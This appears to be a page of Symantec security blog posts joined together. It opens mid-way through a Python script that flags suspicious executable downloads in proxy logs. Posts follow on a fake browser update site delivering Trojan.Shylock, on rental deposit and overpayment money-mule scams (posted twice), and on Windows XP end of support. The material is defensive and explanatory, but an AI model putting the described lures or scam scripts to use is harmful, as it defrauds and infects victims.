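    r"^(?P<time>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) "
    r"(?P<status>\d{3}) (?P<ctype>\S+)$"
)


def host_is_vendor(host: str, brand: str) -> bool:
    """True when host is, or is a subdomain of, one of the brand's vendor hosts."""
    host = host.lower()
    return any(host == v or host.endswith("." + v) for v in VENDOR_HOSTS[brand])


def triage_downloads(log_text: str) -> List[Dict[str, object]]:
    """Return one alert per executable download that matches either rule."""
    alerts: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected format
        url = m.group("url")
        parsed = urlparse(url)
        filename = parsed.path.rsplit("/", 1)[-1]
        if not filename.lower().endswith(EXECUTABLE_EXT):
            continue  # only executable downloads are of interest here
        host = (parsed.hostname or "").lower()
        reasons: List[str] = []
        brand: Optional[str] = next(
            (b for b, pat in BRAND_PATTERNS.items() if pat.search(filename)), None
        )
        if brand and not host_is_vendor(host, brand):
            reasons.append(f"{brand} installer name served from non-vendor host {host}")
        if any(word in host for word in LURE_WORDS):
            reasons.append("host name contains campaign lure words")
        if reasons:
            alerts.append(
                {"client": m.group("client"), "url": url, "brand": brand, "reasons": reasons}
            )
    return alerts


if __name__ == "__main__":
    for alert in triage_downloads(SAMPLE_PROXY_LOG):
        print(alert["client"], alert["url"])
        for reason in alert["reasons"]:
            print("    -", reason)
```

The generic update.exe from files.example.org is deliberately not flagged: neither rule fires on it, which keeps the output focused on downloads that imitate a specific vendor or reuse this campaign's naming. Clients that appear in the alerts are the machines to check for the Trojan.Shylock detection named above.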

Microsoft end of support for Windows XP and Office 2003 - April 2014


As per the Microsoft Support Lifecycle Policy, both Windows XP SP3 and Office 2003 will reach end of support on April 8, 2014. End of support means that after this date no new security updates, non-security hotfixes or patches will be available for either product, and Microsoft technical support for XP will no longer be available either. Running XP SP3 (or lower) and Office 2003 after the end of support date may expose the company to security and compliance risks. It is also worth considering that, aside from the vulnerable operating system, several third-party software vendors are expected to stop supporting their applications on the XP platform after April 2014 as well; this adds the danger of vulnerable applications and multiplies the possible infection vectors.

For Symantec Endpoint Protection customers running SEP 11.x and 12.1 on the XP platform: Symantec will continue releasing definitions for all Windows platforms supported so far, including XP SP3, after April 2014. Please note, though, that in certain cases Symantec Support may not be able to provide a full-scope resolution on XP systems due to the lack of available security patches for it. Additionally, SEP 11.x reached its End of Limited Support on January 5, 2014, and an upgrade to the 12.1 release is highly recommended. For more information, please refer to the Symantec documentation below:

FAQ: Upgrading Symantec Endpoint Protection 11.x to version 12.1.x

Article:TECH207274 | Created: 2013-06-17 | Updated: 2013-11-18 | Article URL http://www.symantec.com/docs/TECH207274

Microsoft End of Support on for Windows XP and what it means for SEP

Article:TECH204937 | Created: 2013-04-10 | Updated: 2013-07-10 | Article URL http://www.symantec.com/docs/TECH204937

References:
http://www.microsoft.com/en-us/windows/enterprise/endofsupport.aspx
http://windows.microsoft.com/en-us/windows/lifecycle
http://windows.microsoft.com/en-us/windows/end-support-help


Usability Study for EV Admins

Symantec would like to get your feedback on how we can improve the existing EV environment to make it easier for you. We are looking for EV administrators who use SCOM to monitor other applications to participate in a 60 minute one-on-one remote usability study between January 20 and 22. Participants will also receive a $75 incentive as a note of thanks for their participation.

You can participate by filling in a 5 minute survey before January 14th.

Looking forward to your participation!

Thanks,
Anjeli
User Researcher

New Year, New Apartment, Same Old Scams


The New Year has started and many people are still holding to their resolutions. Besides the usual suspects of exercising more and quitting smoking, some might have planned on finding a new apartment. Unfortunately, this also means a rise in prepaid rental ad scams. So be cautious while you’re searching for a new home.

The prepaid rental scam advertisements can be encountered on nearly any platform and in most countries. The ads often look very professional; some are even copies of real ads from legitimate sources. We have seen them on established apartment rental sites, online notice boards, B&B agency sites, and even in the classified ads section of newspapers. The website owners try their best to spot false advertisements and delete them as fast as possible, but there is always a chance that there is a new ad that hasn’t been removed yet.

The scam is pretty simple. Once the victim shows interest in the apartment, the alleged landlord informs the victim that he is currently traveling and will not be able to show the apartment in person, but will send the keys after a security deposit has been made. This is a classical advance payment scam. The money is often requested through services other than regular bank wire transfers. After the victim sends the money, the scammer disappears with the deposit and is never heard from again. The key to the apartment is never sent, and the apartment may never have actually existed. Some scammers have even made the effort of sending the victim a real key that does not work on the apartment; the attacker may do this to buy time to erase his tracks before the victim realizes the key does not fit.

Some scammers also use the false pretense of a background check to gather personal information or passport photos of the victim, which can then be used to steal the victim’s identity.

Similar scams can happen in the other direction as well, often with rentals for vacation apartments. In those cases, the scammer pretends to be an interested renter instead of the landlord. Once all the details have been agreed on, the scammer will ask for the bank details in order to proceed with the wire transfer. The trick is that the scammer will transfer more money than the agreed sum to the landlord. This money does not come from the scammer’s bank account, but is instead stolen from an online banking account that has been hijacked by a financial Trojan. After the transfer has been credited, the landlord is contacted and asked to send the excess money back to the now allegedly traveling scammer through other means. A few days later, the landlord will be informed by the bank that the money was stolen and he will have to pay it back, since he served as a money mule.

So no matter whether you are renting or leasing, you should always be vigilant and try to follow a few rules, even if it can be difficult to verify the details.

  • Don’t pay any money in advance if you haven’t seen the apartment or met your contact.
  • If you can’t see the apartment or meet your contact, use a trusted escrow service.
  • Be cautious when sending money to a different address or through unusual financial services.
  • Do not rush the transaction or feel pressured. If the other party is too eager to sell, something might be wrong.
  • Money from a false transaction should only be sent back to the original account that it came from.
  • Search online for the email address or the advertisement text. Others may have already reported it as a scam.

Importance of key management


With the rise of cybercrime, companies are investing significant amounts in information security in order to protect themselves, their employees and partners, but in the end that might not be enough.

Fake Browser Update Site Installs Malware (Japanese edition)


In the first week of 2014, Symantec identified a website that uses well-worn social engineering techniques to push victims into installing malware. The domain is http://newyear[REMOVED]fix.com, registered on December 30, 2013. According to Symantec's research, 94% of the attacks appear to target users in the United Kingdom, and they are delivered through advertising networks and free video streaming and media sites.

The attackers attempt to deceive victims with the following techniques:

  • The URL contains words such as "new year" and "fix".
  • A plausible-looking template (from Google, Microsoft or Mozilla) explains that an urgent update is required for the system to work properly.
  • Depending on the browser type, the user is redirected to a Chrome, Firefox or Internet Explorer Web page. The destination is a fake site, but it looks like the real thing.
  • A JavaScript loop is used to wear the victim down into staying on the site. To close the browser, the [Yes/No] option has to be clicked 100 times.

This kind of social engineering attack, while distinctive, is nothing new. It plays on users' anxiety about having to install urgent updates. The domain was registered only at the end of last year, when the holiday season was already winding down, so it appears the attacker thought of this scheme at the very last moment.

The website is hosted in Ukraine and uses a dual hybrid Web server set up with Apache and Nginx. Of the two, Nginx identifies the victim's browser and performs the redirect.

Depending on the browser in use, users are shown a Google Chrome, Mozilla Firefox or Microsoft Internet Explorer template (Figures 1 to 3).

Fake Browser Update 1.png

Figure 1. Page displayed to Chrome users

Fake Browser Update 2.png

Figure 2. Page displayed to Firefox users

Fake Browser Update 3.png

Figure 3. Page displayed to Internet Explorer users

Fake Browser Update 4.png

Figure 4: Button driven by a JavaScript loop; it does not close until clicked 100 times

At the time of writing, the Internet Explorer version of the Web page has already stopped functioning. The Chrome download page serves Chromeupdate.exe, and the Firefox download page serves Firefoxupdate.exe.

Symantec detects both samples as Trojan.Shylock. Symantec provides the following IPS definition for this attack:

Web Attack: Gongda Exploit Kit Website

To stay protected against this type of threat, Symantec recommends the following:

  • Keep antivirus definitions, operating systems and software up to date.
  • Do not carelessly click on links sent through email, messaging services or social networks, however enticing they look.
  • Only download files from trusted, legitimate sources.

* To subscribe to the RSS feed of the Japanese-language Security Response blog, go to http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja.


New Year, New Home, Same Old Scams (Japanese edition)


The new year has begun, and many people are probably still holding on to their resolutions. Besides the staples of exercising more or quitting smoking, some may be planning to look for a new apartment. However, this also means that prepaid rental scam ads increase, so caution is needed when looking for a new home.

Prepaid rental scam ads can be found in most countries and on almost any platform. The ads all look professional, and some are copies of real ads taken from legitimate sites. Such ads have appeared on established apartment rental sites, online bulletin boards, B&B (bed and breakfast) referral sites, and sometimes even in the classified ad sections of newspapers. Website owners do their best to detect fake ads and remove them as quickly as possible, but there is no end to cases where a new ad is circulating before it has been removed.

The scam is quite simple. As soon as a user shows any interest in a rental property, a message arrives from someone claiming to be the landlord: they are currently traveling and cannot show the property in person, but will send the key once a security deposit has been paid. This is of course a classic advance payment scam, and payment is usually requested by a method other than a regular bank wire transfer. The moment the victim sends the money, the scammer disappears with the deposit and is never seen again. The apartment key never arrives, and it is doubtful whether such a property ever existed at all. Some scammers do actually send a key, but it does not fit the apartment the victim is considering. This is most likely another stalling tactic, buying time to cover their tracks before the victim realizes the key does not fit.

There are also scammers who, under the pretense of a background check, collect victims' personal information or passport photos and misuse them to impersonate the victim.

Similar scams are run in the other direction as well; vacation apartment rental scams, for example, are frequent. In that variant the scammer poses not as the landlord but as a prospective renter. Once the details have been agreed on, the scammer asks for bank details, supposedly to process a wire transfer. The trick is that the scammer first transfers more money to the landlord than the agreed amount. This money does not come from the scammer's bank account; it is actually stolen from an online banking account hijacked by a financial Trojan. Once the transfer is credited, the landlord is contacted and instructed to return the excess by other means to the scammer, who now claims to be traveling. A few days later, the bank informs the landlord that the money was stolen and that, having acted as a money mule, the landlord is obliged to repay it.

So whether you are the one letting or the one renting, always stay alert and follow a few rules as far as possible, even when the details are hard to verify.

  • Do not pay a deposit until you have seen the property or met your contact.
  • If you cannot see the property or meet your contact, use a trusted escrow service.
  • Be very careful when sending money to a different address or through an unusual payment method.
  • Do not rush the transaction or give in to pressure. If the other party is too eager to close the deal, assume something is wrong.
  • Money received from a bogus transaction should only ever be returned to the account it came from.
  • Search the Internet for the email address or the advertisement text; someone may already have reported it as a scam.

* To subscribe to the RSS feed of the Japanese-language Security Response blog, go to http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja.
